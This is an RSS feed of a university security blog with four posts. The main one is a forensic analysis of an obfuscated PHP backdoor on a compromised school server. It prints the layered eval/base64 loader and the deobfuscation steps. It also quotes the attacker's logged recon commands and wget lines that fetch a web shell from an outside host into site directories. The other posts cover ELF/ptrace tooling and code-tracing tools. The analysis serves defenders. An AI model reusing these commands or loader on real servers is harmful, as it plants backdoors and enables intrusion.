<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:creativeCommons="http://backend.userland.com/creativeCommonsRssModule"
>

<channel>
	<title>ISIS &#187; Code</title>
	<atom:link href="http://isisblogs.poly.edu/category/code/feed/" rel="self" type="application/rss+xml" />
	<link>http://isisblogs.poly.edu</link>
	<description>Information Systems and Internet Security</description>
	<lastBuildDate>Mon, 20 Oct 2008 17:57:50 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.5</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<creativeCommons:license>http://creativecommons.org/licenses/by/3.0/us/</creativeCommons:license>
		<item>
		<title>Reverse Engineering a PHP &#8220;Virus&#8221;</title>
		<link>http://isisblogs.poly.edu/2008/02/23/reverse-engineering-a-php-virus/</link>
		<comments>http://isisblogs.poly.edu/2008/02/23/reverse-engineering-a-php-virus/#comments</comments>
		<pubDate>Sat, 23 Feb 2008 07:18:44 +0000</pubDate>
		<dc:creator>aleksey</dc:creator>
				<category><![CDATA[Code]]></category>
		<category><![CDATA[Forensics]]></category>
		<category><![CDATA[Reverse Engineering]]></category>
		<category><![CDATA[Targeted Attacks]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://isisblogs.poly.edu/2008/02/23/reverse-engineering-a-php-virus/</guid>
		<description><![CDATA[In a recent incident a school server (not an ISIS server) was compromised. PHP code was injected that listened to and executed commands passed through a POST request with &#8216;www&#8217; user privileges. Some of the commands that were run include id, pwd as well as directory searches and wgets of various files. The compromised machine [...]]]></description>
			<content:encoded><![CDATA[<p>In a recent incident a school server (not an ISIS server) was compromised. PHP code was injected that listened to and executed commands passed through a POST request with &#8216;www&#8217; user privileges. Some of the commands that were run include <em>id, pwd</em> as well as directory searches and <em>wget</em>s of various files. The compromised machine also served as a hop in a pharmacy ad delivery scheme. It redirected HTTP requests for medications to a <em>possible</em> &#8216;mothership&#8217; server. There is evidence that links to our server were posted as ads on websites like MySpace.</p>
<p><a href="http://isisblogs.poly.edu/wp-content/uploads/sample_ads_small.JPG" rel="lightbox[54]"><img src="http://isisblogs.poly.edu/wp-content/uploads/sample_ads_small.JPG" alt="sample_ads" /></a></p>
<p><span id="more-54"></span></p>
<p>This post will focus on describing the deobfuscation process and inner workings of the PHP code that allowed the mentioned functionality. This is not a very hard case of obfuscation. I also suspect that there is a obfuscating tool out there that did this.</p>
<p>You are presented with an obfuscated PHP file. It is only 2 lines, one contains some readable code, and the other is completely obfuscated. Now what? You can execute it, and watch for system calls, filesystem changes, network connections etc. Or, you can deobfuscate it manually and see exactly what it does.</p>
<p><font color="#0000ff"><strong>PARTIAL CODE:</strong></font></p>
<p>** Note, the original file has everything between &lt;?php ?&gt; tags on one line, and everything else on another. The below code is changed for readability.</p>
<pre>
&lt;?php

$OOO0O0O00=__FILE__;
$O00O00O00=__LINE__;
$OO00O0000=3024;

eval( gzuncompress( base64_decode(
'eNplj1dvwjAAhP9MpNgiCGcQEkV5YG/MXi9VhjMgCzsD+PUFtWorVXdPp7tPO
g4jhPBLyPTSjCSAwxh/BQJPbR4aVRBGBNTrHH4X34aeT3IGuJ+pICJJgca/WEG
6Co0X8Xtp+s8icdI4o4QxYFuMqMqHS5zUJYDlNKfAo8Ry/yJkVYMCfx90rWevc
z1N4uNo02qjw3yVyGoNb/Nxujj3Pfvih+Xj1hCl3V6pqOaQ5Zpl0XRWuPqwGZi8
wLc73V5/MByNJ9PZfIGXq/Vmu9sfjqezZTsu8fwgvFyjOEmzG2V5UVb3xxOJkq
w01Zam1xo8hNAgpRWB30PQ+ATAxF8l'
)));
return;
?&gt;

ZS1SnSy7fix0hJOsJgHQjOum3KfA+qjbZD9rzK0Bn0Mox055+qOlyP3NXGsN+N
n1s9TENweIiWrKaJuwjxWBQ1J7fyrY00bzj7nCW/f/63pqGxNSK7x8a2Dqy7y7
H+6/GWbanfTv9jvS1GGD9piUEOUb/eBfmgHXPHxCXCYZo6cPHCeoQEyh3Gm
Eau3z0i5sOeQNGynhwwKBes2XIjNPrsPSut4/Bz8AAE4KN4PdusO/v4OI5okUJ
......(skipping many bytes)......
Y9yT5MATh+TOXU8==</pre>
<p><em><br />
** Complete PHP file provided per request</em></p>
<p><font color="#0000ff"><strong>OBFUSCATION TECHNIQUES USED:</strong></font></p>
<p>(a) Variable name scrambling (e.g. $OO00O00O0, $IIIIIIII1II)<br />
(b) Insertion of NOP (no operation) statements such as:<br />
$LINE_NUM = 1;<br />
while(&#8211;$LINE_NUM) fgets($FILE_HANDLE,1024);<br />
(c) Use of compacting, mapping functions such as:<br />
strtr() or gzuncompress(base64_decode(â€œstringâ€));<br />
(d) Multiple rounds of obfuscation</p>
<p><font color="#0000ff"><strong>DEOBFUSCATION:</strong></font></p>
<p>The first line of the PHP file contains some readable code squeezed into one line. It needs to be made readable by separating it into multiple lines. Notice the eval(gzuncompress(base64_decode(scrambled code)) line. Replacing <em>eval()</em> with a <em>print</em> gets the job done. When the code is run it spits out more code. Now, variable names such as $OOO0O0O00 are replaced with something more useful. The mapping of variables is noted because as more code gets deobfuscated we need to look those up.</p>
<pre>
&lt;?php

$FILE_NAME=__FILE__;    // Mine is "/home/aleksey/php_virus/file.php"
$LINE_NUM=__LINE__;     // It is "1". Explanation below
$SIZE=3024;

$FILE_HANDLE=fopen($FILE_NAME,'rb');
while(--$LINE_NUM) fgets($FILE_HANDLE,1024); // never gets executed
fgets($FILE_HANDLE,4096);    // reads in the first line, advances the file pointer

$CODE=
gzuncompress( base64_decode( strtr(
fread($FILE_HANDLE,368),
'xFCazDBkYJmXHS7A0WMQn36+OTtIoNZEfbjgivyq/12UV4wr8cePRsplKLud9G5h=',
'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
)));

//eval($CODE);
return;
?&gt;</pre>
<p>Explanation:</p>
<p>__FILE__ is the name of the script file currently being parsed. __LINE__ is the number of the line within the current script file. The code opens itself (its own file) for reading in binary mode. Then, there are <em>fgets()</em> commands for 1024 and 4096 bytes. Next, the $CODE variable is assigned a value and evaluated (another round of decryption).</p>
<p><strong>(2) Second round of decryption.</strong></p>
<p>We need to see what the value of $CODE is in cleartext. Once again, there is a &#8220;gzuncompress(base64_decode(&#8221; instruction which is passed the value of <em>strtr()</em> function (not to confuse with <em>strstr()</em>). The <em>strtr()</em> functions prototype is &#8220;string strtr(string $str, string $from, string $to)&#8221;. It returns a copy of &#8220;str&#8221;, translating all occurrences of each character in &#8220;from&#8221;  to the corresponding character in &#8220;to&#8221;. So we have a mapping of some sort. Now comes the complicated part.</p>
<p>The $str is a string of 368 bytes from the original file. But, there are 2 <em>fgets()</em> statements that advance the file handle before the <em>fread()</em> can read in the 368 bytes. The first <em>fgets()</em> is not executed  because in &#8220;while(&#8211;$LINE_NUM) fgets($FILE_HANDLE,1024);&#8221; the value of LINE_NUM is 1. The second <em>fgets()</em> statement,&#8221;fgets($FILE_HANDLE,4096)&#8221; is executed &#8211; it reads in the whole first line of the file. So, the 368 bytes to be used in the strtr call come from the first 368 bytes of the second line in the original php file.</p>
<p>We use those 368 bytes in â€œgzuncompress(base64_decode(strtr(fread(â€œ as the value for <em>fread()</em>. The resulting code with cleaned up variable names is below. Notice, the $CODE is replaced with its value. The replacement is almost the same as the previous code, except there is also an <em>ereg_replace() </em>call.</p>
<pre>
&lt;?php
$FILE_NAME=__FILE__;   // Mine is "/home/aleksey/php_virus/file.php"
$LINE_NUM=__LINE__;    // It is "1".
$SIZE=3024;

$FILE_HANDLE=fopen($FILE_NAME,'rb');
while(--$LINE_NUM) fgets($FILE_HANDLE,1024); // never gets executed
fgets($FILE_HANDLE,4096);

if (!function_exists('gzuncompress')) die('');

$CODE2=
ereg_replace(
'__FILE__',
"'" . $FILE_NAME . "'" ,
gzuncompress( base64_decode( strtr(
fread($FILE_HANDLE,$SIZE),
'xFCazDBkYJmXHS7A0WMQn36+OTtIoNZEfbjgivyq/12UV4wr8cePRsplKLud9G5h=',
'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
))));

fclose($FILE_HANDLE);
//eval($CODE2);
return;
?&gt;</pre>
<p><strong>(3) Third round of decryption:</strong></p>
<p>We now need to figure out the value of $CODE2. The <em>ereg_replace()</em> prototype is &#8220;string ereg_replace  (string $pattern, string $replacement, string $string)&#8221;. It scans &#8220;string&#8221;  for matches to &#8220;pattern&#8221; , then replaces the matched text with &#8220;replacement&#8221;. Right away we notice that &#8220;pattern&#8221; and &#8220;replacement&#8221; are the same thing. So this is another NOP operation. Again the focus is on  &#8220;gzuncompress(base64_decode(strtr(&#8221;. This time, the strtr() takes as its first argument $SIZE bytes from the second line of the original file. Don&#8217;t forget that in the previous round of decryption, the FILE_HANDLE was advanced 368 bytes. And behold, we finally get the (almost) final version of the code!</p>
<p><a href="http://isisblogs.poly.edu/wp-content/uploads/final_still_obfuscated_code.txt" title="code_version1">code_version1</a></p>
<p><strong>(4) Fourth round of deobfuscation.</strong></p>
<p>We finally have some useful PHP code. But part of it is still scrambled. There is another series of &#8220;gzinflate(base64_decode(&#8221; commands in the beginning of this code. I will simply present the results as I have already described what to do. It is worth mentioning that this time you need to do 13 iterations on the same little piece of code to get to the clear text code. This needs to be automated. The stopping condition is when there is no more &#8220;eval(gzinflate(base64_decode(&#8221; commands in the code. A python script like <a href="http://isisblogs.poly.edu/wp-content/uploads/deobfuscate.txt" title="this">this</a> solves the problem.</p>
<p><a href="http://isisblogs.poly.edu/wp-content/uploads/final_deobfuscated_code.txt" title="code_version2">code_version2</a></p>
<p><font color="#0000ff"><strong>SUMMARY</strong></font></p>
<p>So what exactly does the code do?<br />
(a) Executes a command passed in $_POST["I1llI1"]. Could be any system command.<br />
(b) Its mothership is &#8220;hxxp://bessearches.info/virtual/gen.php&#8221;. Queries to our exploited server, such as â€œGET_php_virus?/phentermine/drug-phentermine.htmlâ€ are satisfied by pulling actual information from the mothership and displaying it on exploited server.</p>
<p>What command were run on the infected machine?<br />
There is no way of telling as they were passed in the POST request. But during sniffing phase, the attacker entered the following commands.</p>
<pre>
ls -lidpwd
find /Volumes/SSDrive/websites/SITENAMEHERE/ -user www -print
wget hxxp://www.pharmacy-directs.com/shell2.txt -O /Volumes/SSDrive/websites/SITENAMEHERE/allimages/rma.php
wget hxxp://www.pharmacy-directs.com/shell2.txt -O /Volumes/SSDrive/websites/SITENAMEHERE/unilogo/rma.php
find /Volumes/SSDrive/websites -user www -name "*.php" -ctime -40 -print
cat /Volumes/SSDrive/websites/SITENAMEHERE/images/faculty.php</pre>
<p>So we can see that the attacker was doing some reconnaissance as well as installing other backdoors.</p>
<p><font color="#0000ff"><strong>FOLLOW UP</strong></font></p>
<p>The mothership (<em>hxxp://bessearches.info/virtual/gen.php</em>) is still up. Simply entering this URL spits out  an obfuscated string that looks like the second line of our file, but longer. If I have some free time, I will write a script to do parse it.</p>
<p><font color="#0000ff"><strong>ADDITIONS</strong></font></p>
<p>[2008-02-25] This malware has backdoor and adware functionality and should be classified as such. (thanks <a href="http://schmoil.blogspot.com/" rel="external nofollow">Schmoilito</a>)</p>
]]></content:encoded>
			<wfw:commentRss>http://isisblogs.poly.edu/2008/02/23/reverse-engineering-a-php-virus/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>&#8220;All Injection Attack Vectors&#8221;</title>
		<link>http://isisblogs.poly.edu/2007/02/08/all-injection-attack-vectors/</link>
		<comments>http://isisblogs.poly.edu/2007/02/08/all-injection-attack-vectors/#comments</comments>
		<pubDate>Thu, 08 Feb 2007 05:05:09 +0000</pubDate>
		<dc:creator>Jason Bourne</dc:creator>
				<category><![CDATA[Code]]></category>

		<guid isPermaLink="false">http://isisblogs.poly.edu/2007/02/08/all-injection-attack-vectors/</guid>
		<description><![CDATA[Over at Mokka mit Schlag Elliotte Rusty Harold (he teaches Java/XML at Poly) is asking whether SQL is the only language with injection attack vector? What about XML/ XPath, JSON, etc. Is there a comprehensive attack-tree for injection attacks? See if you can answer some of these questions.
]]></description>
			<content:encoded><![CDATA[<p>Over at <em>Mokka mit Schlag </em>Elliotte Rusty Harold (he teaches Java/XML at Poly) is asking whether SQL is the only language with injection attack vector? What about XML/ XPath, JSON, etc. Is there a comprehensive attack-tree for injection attacks? <a href="http://www.elharo.com/blog/software-development/web-development/2007/02/04/all-injection-attack-vectors/">See if you can answer some of these questions.</a></p>
]]></content:encoded>
			<wfw:commentRss>http://isisblogs.poly.edu/2007/02/08/all-injection-attack-vectors/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>Prodding programs</title>
		<link>http://isisblogs.poly.edu/2007/02/06/prodding-programs/</link>
		<comments>http://isisblogs.poly.edu/2007/02/06/prodding-programs/#comments</comments>
		<pubDate>Tue, 06 Feb 2007 23:34:39 +0000</pubDate>
		<dc:creator>Yan Ivnitskiy</dc:creator>
				<category><![CDATA[Code]]></category>
		<category><![CDATA[Low-level]]></category>
		<category><![CDATA[Operating Systems]]></category>
		<category><![CDATA[Reverse Engineering]]></category>

		<guid isPermaLink="false">http://isisblogs.poly.edu/2007/02/06/prodding-programs/</guid>
		<description><![CDATA[I will try to keep this to the point. Auto-completion on the terminal is something we all love and it makes using a UNIX system and running commands far more pleasant. Most shells can auto-complete path names, binary names, and built in commands. Bash goes further and supports auto-completing user names, hosts and a few [...]]]></description>
			<content:encoded><![CDATA[<p>I will try to keep this to the point. Auto-completion on the terminal is something we all love and it makes using a UNIX system and running commands far more pleasant. Most shells can auto-complete path names, binary names, and built in commands. Bash goes further and supports auto-completing user names, hosts and a few other trivial things. No shell that I know of has ever attempted to auto-complete the arguments that the binaries take. Leaving out support for this makes sense, as there is no common way for a binary to store the arguments it can take inside the program binary, and it is bound to be a porting nightmare.</p>
<p>Keeping this in mind, I realized that almost every single UNIX binary gets its arguments from the shell in a standard, POSIX-compliant way. The <a href="http://www.freebsd.org/cgi/man.cgi?query=getopt&#038;apropos=0&#038;sektion=3&#038;manpath=FreeBSD+6.2-RELEASE&#038;format=html">getopt</a> libc function call parses the input from the shell in to usable internal flags. If one were to peek inside what each binary gives to getopt(), one would find out all arguments it is expecting to take and provide more insight about the executable! This is what I have done and what the remainder of the post is about.</p>
<p>This is what my previous post related to. Now I realize this is a slightly silly goal. My primary reason for doing this is to learn the techniques I&#8217;ve used to get there, which I simply could not learn without experimentation and a concrete goal in mind. The way this problem was attacked as follows:</p>
<p><span id="more-13"></span></p>
<p>Each step has an explanation of it below it:</p>
<h2>How this works</h2>
<ol>
<li>I use <a href="http://wiki.freebsd.org/LibElf">libelf(3)</a> to open the binary, and read its sections.</li>
<ul>
<li>Most UNIX binaries are in the ELF format. The official draft is included in the tarball at the end of this post. ELF (or Executable and Linkable Format) is a file format that most UNIX systems today understand.</li>
</ul>
<li>The sections I care about are the PLT and the dynamic symbols section.</li>
<ul>
<li>An ELF file contains information in sections. The two sections I mentioned are the section that contains the dynamic symbols and the procedure linkage table</li>
<ul>
<li><b>Dynamic symbols</b> &#8211; When you write a program that uses a shared library, libc being the prime example. One copy of libc is shared among many processes, and when you compile a program, the actual code from libc does not get compiled into the binary. What happens is that your compiler leaves a little note to your operating system (or the operating system loader [Not the boot loader! <img src='http://isisblogs.poly.edu/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> ]) saying &#8220;Here I call some functions that should be in a shared library that you might have loaded, and if not you can load it as you need it. I will be calling printf and getopt, so I will reference to them as if I have them. Please fill in those references as you find your own copy of libc&#8221;. That list of functions is called the <b>dynamic symbol</b> table. Each process that utilizes shared libraries (which is almost all of them) has a GOT (or a Global Offset Table) which is a table that maps those symbols to the locations in the library where the code actually is. So when you call printf() in your code, in the compiled instructions, the code actually looks at the printf() entry in the GOT and jumps to whichever address it points to. When you leave those references &#8216;open&#8217; as I mentioned earlier, those entries are simply not filled in. When the loader resolves those references, it fills in the proper address of the shared library. So to picture it, the flow of execution is as follows: printf() &#8211;> GOT &#8211;> actual printf code. Now for reasons outside the scope of this post, there is yet another level of indirection. So in reality the flow is: printf() &#8211;> PLT &#8211;> GOT &#8211;> actual printf(). The <b>PLT</b> is a series of jump statements that go to the GOT. This jump table is what we focus on.
	 		</ul>
</ul>
<li>I then extract the position of the getopt symbol and look it up in the PLT.</li>
<ul>
<li>From the information I retrieved using libelf, I check at which address the PLT table gets loaded (section &#8216;.plt&#8217;), then I check the index of the getopt symbol in the symbol table, and I obtain the address of the PLT entry by simply performing: .plt + (getopt position + 1) * 0&#215;10 (0&#215;10 is the size of a plt entry as far as I know, and +1 because I want to skip the 0th entry of the PLT table)
	</ul>
<li>I start the binary, overwrite the proper address, set a breakpoint, and extract the arguments.</li>
<ul>
<li>I now have the jump that gets taken every time when getopt gets called. I now fork() and before I execv() the process, I enable the process to be traced with the ptrace(3) interface. This is the same method that debuggers use to attach to processes. The parent gets notified once the child is finished being loaded if it is being traced. Once I get notified that it is created, with the proper address of getopt in hand, I overwrite that jmp instruction with a int3 instruction (or 0xCC assembled. Something to note, in my code I overwrite it with 0xcccccccc, which is just four int3 instructions. I didn&#8217;t want to bother with byte-ordering or alignment issues, so I just overwrote the entire word. Since the instruction is only one byte, it works just fine.) This instruction will trap into the parent once reached. This is also how debuggers set breakpoints, with a slight difference: They save the original instruction they overwrote so they can restore it on the next execution, but since I simply don&#8217;t care for it to continue running I can just go walking all over it. Now I continue the child process.</li>
<li>All my child interaction and prodding was done with the ptrace() system call.</li>
<li>Once the parent gets trapped again, I now know that I am at the point where getopt() was JUST called. If you remember, the standard C calling convention is to push all the arguments to the stack and then call the function. I now know that %esp points to the first argument passed, so I know that at a certain offset will be the last argument, which is the string of every argument that a binary is expecting, which is what I care about.</li>
<li>I now know where the string of arguments is in the child&#8217;s address space, at which point I can safely extract it, then kill the child process before it does anything. How mean.</li>
</ul>
<li>I can now rinse+repeat for other binaries in which I&#8217;m interested.</li>
</ol>
<h2>Why this works</h2>
<ol>
<li>More programs call getopt() as one of the absolute first things they do. This means that there is a very low chance that any side-effects will come up.</li>
<li>This is fast since the OS only loads the pages of code that are being executed, and there is a very high chance that getopt will live in the first page of code, making it pretty fast.</li>
</ol>
<p>Something to note here: Not all binaries use getopt. This is a problem, but not one that I care about to fix. This took a little over three weeks to complete due to the lack of material about the matter on the Internet, and the <i>slightly</i> esoteric nature of the solution. Check out the ltrace utility if you want something like what I wrote on steroids (outlines every single library call with all arguments).</p>
<p>I originally attempted to read ltrace source to figure out how to solve the problem, but it confused me more than it helped me. In the end a sit down with the ELF spec and some time is what it took.</p>
<p>If you have <b>any</b> questions, comments, additions or critiques, please either comment on the post or send me an email.</p>
<p>The code I wrote and used can be found here: <a href="http://isis.poly.edu/~yan/readgo.tbz">http://isis.poly.edu/~yan/readgo.tbz</a> (You&#8217;d need libelf installed to get it to compile/run). This only works on FreeBSD/i386. Linux has a slightly different ptrace() interface, so porting will be trivial, but existent.</p>
<p>Since everyone loves some sample output:</p>
<blockquote><p>
yan@tissue$ ./readgo /bin/ls /bin/rm<br />
/bin/ls: 1ABCFGHILPRSTUWZabcdfghiklmnopqrstuwx<br />
/bin/rm: dfiIPRrvW
</p></blockquote>
<p>edit: Fixed a lot of grammatical mistakes thanks to Kurt.</p>
<p>Thanks for reading,<br />
Yan</p>
]]></content:encoded>
			<wfw:commentRss>http://isisblogs.poly.edu/2007/02/06/prodding-programs/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>Tools for implicit code understanding</title>
		<link>http://isisblogs.poly.edu/2007/02/06/tools-for-implicit-code-understanding/</link>
		<comments>http://isisblogs.poly.edu/2007/02/06/tools-for-implicit-code-understanding/#comments</comments>
		<pubDate>Tue, 06 Feb 2007 01:53:47 +0000</pubDate>
		<dc:creator>Yan Ivnitskiy</dc:creator>
				<category><![CDATA[Code]]></category>
		<category><![CDATA[Operating Systems]]></category>
		<category><![CDATA[Reverse Engineering]]></category>

		<guid isPermaLink="false">http://isisblogs.poly.edu/2007/02/06/tools-for-implicit-code-understanding/</guid>
		<description><![CDATA[In the last few weeks, I have been needing to understand a lot of existing source code. People, including myself, often try to reverse-engineer binaries and not pay much attention to reverse-engineering available code, if that&#8217;s the proper way to call it. While not reverse-engineering in its core, analyzing source code tends to tickle similar [...]]]></description>
			<content:encoded><![CDATA[<p>In the last few weeks, I have been needing to understand a lot of existing source code. People, including myself, often try to reverse-engineer binaries and not pay much attention to reverse-engineering available code, if that&#8217;s the proper way to call it. While not reverse-engineering in its core, analyzing source code tends to tickle similar parts of the brain as when reverse-engineering binaries. This post is a short description of the tools and techniques I&#8217;ve been using and hope to receive suggestions to techniques I have been missing.</p>
<p>The tool in question is ltrace, which I believe is a doing of mostly the Debian project (I can be wrong), with a port to FreeBSD which is what I have been using. I have spent enough hours trying to just read source code, using grep to look for where to look for my next step.</p>
<p>Read on for descriptions!</p>
<p><span id="more-11"></span></p>
<p>GNU gprof, or GNU profiler, is a tool used to typically measure the performance and runtime (not algorithmic) of components. When using gprof, compile your target program with flags &#8216;-g -pg&#8217;. That will compile the program with debugging symbols, and add extra code that can generate profiling information. If you need to use gprof on a port or an existing application that uses the standard GNU building toolchain, just add &#8216;-g -pg&#8217; to CFLAGS inside the Makefile. Also, look for lines where the program gets linked, as that needs &#8216;-g -pg&#8217; as well. Then, use gprof to execute the program with the arguments that you will want to profile, e.g. &#8216;<code>gprof ./ltrace /bin/ls 2>/dev/null > ltrace_gprof.out</code>&#8216;. That will create a file, ltrace_gprof.out that will contain all procedures that were executed, and all called from them. This simplifies tracing of code for specific execution of binaries. By passing the required arguments, you are crafting the execution thread to your liking. While I did not use gprof to profile, I did use it to trace the execution in a more-or-less high-level fashion.</p>
<p>The second tool I want to write about is GNU cflow. cflow, which I&#8217;m sure everyone except me knew about, takes a number of C files, and generates a graph of the function call hierarchy. It is very useful to see how a program executes, in a static fashion. One can just call &#8216;<code>cflow -X *.c</code>&#8216; and look at a pstree-like representation of the call graph. In my opinion, very useful in understanding the flow of a program. Here is some sample output:</p>
<p><code>
<pre>
77                      fopen {}
78                      fgets {}
79                      process_line {read_config_file.c 112}
80                              debug_ ... {62}
81                              eat_spaces {read_config_file.c 70}
82                              str2type {read_config_file.c 55}
83                                      strlen {}
84                                      strncmp {}
85                                      index {}
86                              start_of_arg_sig {read_config_file.c 81}
87                                      strlen {}
88                              output_line ... {66}
</pre>
<p></code></p>
<p>Why am I playing with these tools? To complete a piece of code that has stagnated at being at 80% completion, or so I think. More info on the tool along with complete source as I get it to some working state.</p>
]]></content:encoded>
			<wfw:commentRss>http://isisblogs.poly.edu/2007/02/06/tools-for-implicit-code-understanding/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by/3.0/us/</creativeCommons:license>
	</item>
	</channel>
</rss>
